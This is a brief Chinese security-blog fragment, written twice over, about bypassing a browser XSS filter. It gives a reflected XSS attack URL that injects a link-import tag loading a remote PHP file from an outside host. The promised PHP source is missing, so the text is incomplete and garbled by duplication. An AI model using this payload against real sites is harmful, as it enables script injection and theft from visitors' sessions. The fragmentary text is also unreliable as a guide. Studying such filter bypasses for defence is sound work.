构造php源码如下:
攻击url:如果id存在反射型xss:
http://127.0.0.1/index.php?id=%3Clink%20rel=import%20href=http://wutongyu.info/host.php%3E
访问直接绕过了xss过滤器:
test
构造php源码如下:
攻击url:如果id存在反射型xss:
http://127.0.0.1/index.php?id=%3Clink%20rel=import%20href=http://wutongyu.info/host.php%3E
访问直接绕过了xss过滤器:
test
阅读:189952 | 评论:0 | 标签:xss